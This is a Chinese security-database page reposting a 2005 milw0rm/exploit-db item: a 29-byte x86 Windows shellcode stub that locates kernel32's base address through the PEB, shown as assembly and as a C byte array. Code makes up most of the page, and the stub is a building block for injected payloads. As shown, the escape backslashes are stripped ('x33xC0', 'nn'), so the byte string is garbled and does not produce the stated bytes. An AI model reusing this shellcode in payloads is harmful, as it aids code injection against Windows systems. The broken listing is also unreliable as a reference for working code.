Windows (9x/NT/2000/XP) – PEB Method Shellcode (29 bytes)-安全小百科

Windows (9x/NT/2000/XP) – PEB Method Shellcode (29 bytes)

漏洞ID	1055289	漏洞类型
发布时间	2005-07-26	更新时间	2005-07-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Windows_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13525

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

//
// PEB way of getting kernel32 imagebase by loco.
// Compatible with all Win9x/NT based operating systems.
//
// Gives kernel32 imagebase in eax when executing.
// 29 bytes, only eax/esi used.
//
// Originally discovered by Dino Dai Zovi.
//
//

#include <stdio.h>

/*
	xor   eax, eax
	add   eax, fs:[eax+30h]
	js    method_9x

method_nt:
	mov   eax, [eax + 0ch]
	mov   esi, [eax + 1ch]
	lodsd
	mov   eax, [eax + 08h]
	jmp   kernel32_ptr_found

method_9x:
	mov   eax, [eax + 34h]
	lea   eax, [eax + 7ch]
	mov   eax, [eax + 3ch]
kernel32_ptr_found:
*/

unsigned char Shellcode[] =
	"x33xC0"          // xor eax, eax
	"x64x03x40x30"  // add eax, dword ptr fs:[eax+30]
	"x78x0C"          // js short $+12
	"x8Bx40x0C"      // mov eax, dword ptr [eax+0C]
	"x8Bx70x1C"      // mov esi, dword ptr [eax+1C]
	"xAD"              // lodsd
	"x8Bx40x08"      // mov eax, dword ptr [eax+08]
	"xEBx09"          // jmp short $+9
	"x8Bx40x34"      // mov eax, dword ptr [eax+34]
	"x8Dx40x7C"      // lea eax, dword ptr [eax+7C]
	"x8Bx40x3C"      // mov eax, dword ptr [eax+3C]
; // = 29 bytes.

int main()
{
	printf("Shellcode is %u bytes.nn", sizeof(Shellcode)-1);
	return 1;
}

// milw0rm.com [2005-07-26]

相关推荐: Lotus Domino Dot File Disclosure Vulnerability

Lotus Domino Dot File Disclosure Vulnerability 漏洞ID 1100822 漏洞类型 Input Validation Error 发布时间 2003-02-12 更新时间 2003-02-12 CVE编号 N/A …

文章版权归作者所有，未经允许请勿转载。

THE END